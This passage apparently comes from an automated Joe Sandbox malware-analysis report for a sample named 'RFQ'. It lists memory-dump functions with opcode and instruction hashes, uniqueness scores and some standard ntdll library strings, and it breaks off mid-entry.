                                                                                                        • Opcode ID: 56a0d1e57f255cd34286b5b4d94bbe192afc06143bfc7090370d4497c6d6d2cc
                                                                                                        • Instruction ID: 73299bd02377072eb8c8e40e63927a9d70ed4a75ea79c59122a6b474059bfe4d
                                                                                                        • Opcode Fuzzy Hash: 56a0d1e57f255cd34286b5b4d94bbe192afc06143bfc7090370d4497c6d6d2cc
                                                                                                        • Instruction Fuzzy Hash: 4B90023124140402D14171584444606900AA7D0341FD6C012A0424558ECA598B56AB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c4f4296fc274b73126ca8a99716030803bcac6efdde76dc51c13ae4a7ca8fb58
                                                                                                        • Instruction ID: 9706aff88f3bd91197c5f211321ff7d45f438105a5e28432dbe54f873f8e2cc4
                                                                                                        • Opcode Fuzzy Hash: c4f4296fc274b73126ca8a99716030803bcac6efdde76dc51c13ae4a7ca8fb58
                                                                                                        • Instruction Fuzzy Hash: 31900221242441525545B1584444507D007A7E0341BD6C012A1414954CC92A9956D721
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a7b3233e987366ea300d88fb47a059c9116f231df8ffa22d730427b9d102bd0
                                                                                                        • Instruction ID: b263e706e0dcd2e24fa026c459e1cf829fa248f8be0f522f62df6f9ca9c22f49
                                                                                                        • Opcode Fuzzy Hash: 7a7b3233e987366ea300d88fb47a059c9116f231df8ffa22d730427b9d102bd0
                                                                                                        • Instruction Fuzzy Hash: A590022130140003D14071585458606D006E7E1301F96D011E0414558CDD1989565322
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72D00 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a1061009428fdc7fbf1eb66c442146564f1863646e5be70566ff2d831037b3c
                                                                                                        • Instruction ID: cd95c61c4c98cd6b5bfc66336b68ed7effc793f103d559126935d339a0f23570
                                                                                                        • Opcode Fuzzy Hash: 8a1061009428fdc7fbf1eb66c442146564f1863646e5be70566ff2d831037b3c
                                                                                                        • Instruction Fuzzy Hash: 6490022120544442D10075585448A06900697D0305F96D011A1064599DCA398951A231
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51215c6876a0f6641c013f8e979d434d7aecfffdc786c63970f60c32b61b3da8
                                                                                                        • Instruction ID: 7eb50dee987f969c8c4f32a0c67b8c6575a21410f3b0760b191d35298140845f
                                                                                                        • Opcode Fuzzy Hash: 51215c6876a0f6641c013f8e979d434d7aecfffdc786c63970f60c32b61b3da8
                                                                                                        • Instruction Fuzzy Hash: B190022921340002D1807158544860A900697D1302FD6D415A001555CCCD1989695321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: be2f61f5ad71f9d12666563690c590c3c01b319d042b7c5bf1290a414b276867
                                                                                                        • Instruction ID: 5a8b764062d5272e4b4a9b7a76f58c1dbcffebe3f8d15d65d6060494337556cf
                                                                                                        • Opcode Fuzzy Hash: be2f61f5ad71f9d12666563690c590c3c01b319d042b7c5bf1290a414b276867
                                                                                                        • Instruction Fuzzy Hash: 8D90023120140402D10075985448646900697E0301F96D011A5024559ECA6989916231
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 44e38f138f29481fa21818084d1dc3e0e09d5d286e7af7de1cacd566ce9bb4eb
                                                                                                        • Instruction ID: 7403012901554bafebfcde02786c3436cf24829f7aaf30bc6f43d97792e6120f
                                                                                                        • Opcode Fuzzy Hash: 44e38f138f29481fa21818084d1dc3e0e09d5d286e7af7de1cacd566ce9bb4eb
                                                                                                        • Instruction Fuzzy Hash: EB90023120140403D10071585548707900697D0301F96D411A042455CDDA5A89516221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4d2680a52cee1e9f112e806fedfd70be2fe835916a03d999cf6bf924f82c523
                                                                                                        • Instruction ID: c5c29438cf384bca3b12c9042d5e297e9986630efec604c616d6906a3ae955fa
                                                                                                        • Opcode Fuzzy Hash: f4d2680a52cee1e9f112e806fedfd70be2fe835916a03d999cf6bf924f82c523
                                                                                                        • Instruction Fuzzy Hash: 8F90022160540402D14071585458706901697D0301F96D011A0024558DCA5D8B5567A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72C60 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c6d377ce43988576504db32a99889cdc9e9cb4dcaa640d063ad277b48a84d85c
                                                                                                        • Instruction ID: 1f49ec43e8a25253b1a0342bf81a4e1312c38886365e03a13893955b28dc53a4
                                                                                                        • Opcode Fuzzy Hash: c6d377ce43988576504db32a99889cdc9e9cb4dcaa640d063ad277b48a84d85c
                                                                                                        • Instruction Fuzzy Hash: D790023120140842D10071584444B46900697E0301F96C016A0124658DCA19C9517621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9101fb7ee4a3eb5186fbb71508fa7d1a69cfa216771a421a112f6195739931a6
                                                                                                        • Instruction ID: 9fe737c842bab2063f9e84d0931f1bfe226c9cc5e5ebfc2ce91e288f7ba58eff
                                                                                                        • Opcode Fuzzy Hash: 9101fb7ee4a3eb5186fbb71508fa7d1a69cfa216771a421a112f6195739931a6
                                                                                                        • Instruction Fuzzy Hash: 9990023120180402D10071584848747900697D0302F96C011A5164559ECA69C9916631
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c2fdb853c4c743c848f7fd2ebcdacf2da48ffc977e6c5d3119dad3a31fdd36eb
                                                                                                        • Instruction ID: 4e80417eb277d7cb4b9e3f4705b0774f89f1b063f9faa3e088faf8fc35904a28
                                                                                                        • Opcode Fuzzy Hash: c2fdb853c4c743c848f7fd2ebcdacf2da48ffc977e6c5d3119dad3a31fdd36eb
                                                                                                        • Instruction Fuzzy Hash: 5090022160140042414071688884906D006BBE1311B96C121A0998554DC95D89655765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72F90 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd2c712f27d4d95dd41016b7594788b8e1afcd41b24b51dadf3de724de73bd94
                                                                                                        • Instruction ID: fe463f1c40f707ee24b894652f8e043f1d3158b8bb6703b9feea563fcdd11623
                                                                                                        • Opcode Fuzzy Hash: dd2c712f27d4d95dd41016b7594788b8e1afcd41b24b51dadf3de724de73bd94
                                                                                                        • Instruction Fuzzy Hash: DA90023120180402D1007158485470B900697D0302F96C011A1164559DCA2989516671
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84a69d2429a43f98eda73082cc7b7f49cd99f69077e242522a64246078f8e1bc
                                                                                                        • Instruction ID: 191d568b1df44a74ea257a20087c121e79946f7577364569371beb8f8ef458bb
                                                                                                        • Opcode Fuzzy Hash: 84a69d2429a43f98eda73082cc7b7f49cd99f69077e242522a64246078f8e1bc
                                                                                                        • Instruction Fuzzy Hash: 5D900221211C0042D20075684C54B07900697D0303F96C115A0154558CCD1989615621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eb82c59cab4ae9aa5e9f3bdb838203361aeda6ddd55d623ca2127bc23a492004
                                                                                                        • Instruction ID: e872fcaf9a92a3f0dc325997ce1907676f32dc4bece6f716d725e8b96afa0350
                                                                                                        • Opcode Fuzzy Hash: eb82c59cab4ae9aa5e9f3bdb838203361aeda6ddd55d623ca2127bc23a492004
                                                                                                        • Instruction Fuzzy Hash: 7D90026134140442D10071584454B069006D7E1301F96C015E1064558DCA1DCD526226
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72F60 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d22236e8cf5b35053a5470570ec9381d70ea9856743648fa97b903ec9a36be15
                                                                                                        • Instruction ID: 70ac7a9c0498f79b3e55d06ea8be4b843c201fc879345e0480f753638c3f181b
                                                                                                        • Opcode Fuzzy Hash: d22236e8cf5b35053a5470570ec9381d70ea9856743648fa97b903ec9a36be15
                                                                                                        • Instruction Fuzzy Hash: 4790026121140042D10471584444706904697E1301F96C012A2154558CC92D8D615225
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4972d4a8aba1def4c073d45829eda2866eff433a8ca79ed87a294a21d4e4b388
                                                                                                        • Instruction ID: d65b383cd3beba14edc9e3801875e56cacb940ce6929104de88469ac9f3c52f8
                                                                                                        • Opcode Fuzzy Hash: 4972d4a8aba1def4c073d45829eda2866eff433a8ca79ed87a294a21d4e4b388
                                                                                                        • Instruction Fuzzy Hash: E590027120140402D14071584444746900697D0301F96C011A5064558ECA5D8ED56765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72E80 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 864bce36451c0f5fb3c4da6ece616518094a61a79ba984408e3ec766321fbd90
                                                                                                        • Instruction ID: 5c65955acfe2ee4a02fd534a81e6b001e165dd71fb0de900c0934905929400a3
                                                                                                        • Opcode Fuzzy Hash: 864bce36451c0f5fb3c4da6ece616518094a61a79ba984408e3ec766321fbd90
                                                                                                        • Instruction Fuzzy Hash: 9290022160140502D10171584444616900B97D0341FD6C022A1024559ECE298A92A231
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c2ed0ce64350a7f1259bcb9a33764ee3a00035552dfa9ed2aa7bb8dda2f6fb34
                                                                                                        • Instruction ID: 9978d56f4f107dcb1faa8dabb934563bbf9c4b2d7970f8e98ced6e389346d199
                                                                                                        • Opcode Fuzzy Hash: c2ed0ce64350a7f1259bcb9a33764ee3a00035552dfa9ed2aa7bb8dda2f6fb34
                                                                                                        • Instruction Fuzzy Hash: 5790026120180403D14075584844607900697D0302F96C011A2064559ECE2D8D516235
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72E30 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a72ebcb5a1aa5cb49518e8542fac4bd5b55d6fdc79c89c9f683b5b1ee2056e6
                                                                                                        • Instruction ID: 917ba78672ca044540b6f1928451cb1ac5a5f7619b9aa85249112c7fecdd2c33
                                                                                                        • Opcode Fuzzy Hash: 0a72ebcb5a1aa5cb49518e8542fac4bd5b55d6fdc79c89c9f683b5b1ee2056e6
                                                                                                        • Instruction Fuzzy Hash: 8590022130140402D10271584454606900AD7D1345FD6C012E1424559DCA298A53A232
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A73090 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2faa9b0c5ba5c685b5cbc3eeffed3c1cce43d7ee2d20d1deba0b1db674468010
                                                                                                        • Instruction ID: 7930696c6d1f030a3d7cf1447547986b745df1783f6f5f5c75006b827773a218
                                                                                                        • Opcode Fuzzy Hash: 2faa9b0c5ba5c685b5cbc3eeffed3c1cce43d7ee2d20d1deba0b1db674468010
                                                                                                        • Instruction Fuzzy Hash: C690022124140802D140715884547079007D7D0701F96C011A0024558DCA1A8A6567B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A73010 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b76a37c2878585a47f5b29d31e2d51ad9b3cddf1e291804d85b2d834698438c2
                                                                                                        • Instruction ID: 5a8c91ec3a405b30b1de921a0d20de0e38de7e32555d4184f59f1fede4e0a93e
                                                                                                        • Opcode Fuzzy Hash: b76a37c2878585a47f5b29d31e2d51ad9b3cddf1e291804d85b2d834698438c2
                                                                                                        • Instruction Fuzzy Hash: B590022120184442D14072584844B0FD10697E1302FD6C019A4156558CCD1989555721
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a38edac6b7a0f5c3d909b2c2233033304057fbedd616b3e2d7586e007345b146
                                                                                                        • Instruction ID: d6cc1f573890dd434b65d48bd3114fa9dbb8701c1ea8e688df4b3ece5f635534
                                                                                                        • Opcode Fuzzy Hash: a38edac6b7a0f5c3d909b2c2233033304057fbedd616b3e2d7586e007345b146
                                                                                                        • Instruction Fuzzy Hash: E990022124545102D150715C4444616D006B7E0301F96C021A0814598DC95989556321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A73D10 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 80327e96794cb68976a19a86fc6a4742d15a079dd36163e88d6282daec31797f
                                                                                                        • Instruction ID: 6f9e028338192839b78f08332a9e5b07d5ee6f9566b1f858ba54372e666a3aac
                                                                                                        • Opcode Fuzzy Hash: 80327e96794cb68976a19a86fc6a4742d15a079dd36163e88d6282daec31797f
                                                                                                        • Instruction Fuzzy Hash: BE90023120240142954072585844A4ED10697E1302FD6D415A0015558CCD1889615321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A73D70 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 90d5513ee2f77b57424e22926bc31e53dd04c5e391eb1f535b3b204b70d7e295
                                                                                                        • Instruction ID: 7938cd8c4b2f3d7112886eb6ba9c4db8dc0dfb235168719f3c78446c30ddb6e8
                                                                                                        • Opcode Fuzzy Hash: 90d5513ee2f77b57424e22926bc31e53dd04c5e391eb1f535b3b204b70d7e295
                                                                                                        • Instruction Fuzzy Hash: D090023520140402D51071585844646904797D0301F96D411A042455CDCA5889A1A221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: 9273192d2a0b87b57e3a41d5011fd60890a67506c8b5815046845f0fcd3f8fe9
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                                                                                        • Instruction ID: 7c21d6822d236131b9913913ef5a0dfbf250e4b4edfd2c9a628b0870a7658dca
                                                                                                        • Opcode Fuzzy Hash: 5e3cd32e2883f3e781b0b95687b25a561a15e9367f7e86953c62e4069d6db0b6
                                                                                                        • Instruction Fuzzy Hash: 7951B7B5A00117BFDB11DBAD8D90A7EFBF8BB48240B54816AE495D7641D334DF44CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AE2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 7cc57e52cd0284592ea7fc573caac9c536cfb870ac1c709cb341b4a91e75aa74
                                                                                                        • Instruction ID: 5cb726c11dac4c1db8f912808bc8ff33a3e805fb2fe0567d806c93f9a428626d
                                                                                                        • Opcode Fuzzy Hash: 7cc57e52cd0284592ea7fc573caac9c536cfb870ac1c709cb341b4a91e75aa74
                                                                                                        • Instruction Fuzzy Hash: 6351E671A00645AEDF35DF6CCA94A7EB7FCEF48300B04846AE596D7642D6B8EA408770
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AA4742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AA4787
                                                                                                        • ExecuteOptions, xrefs: 01AA46A0
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AA4725
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AA4655
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AA46FC
                                                                                                        • Execute=1, xrefs: 01AA4713
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
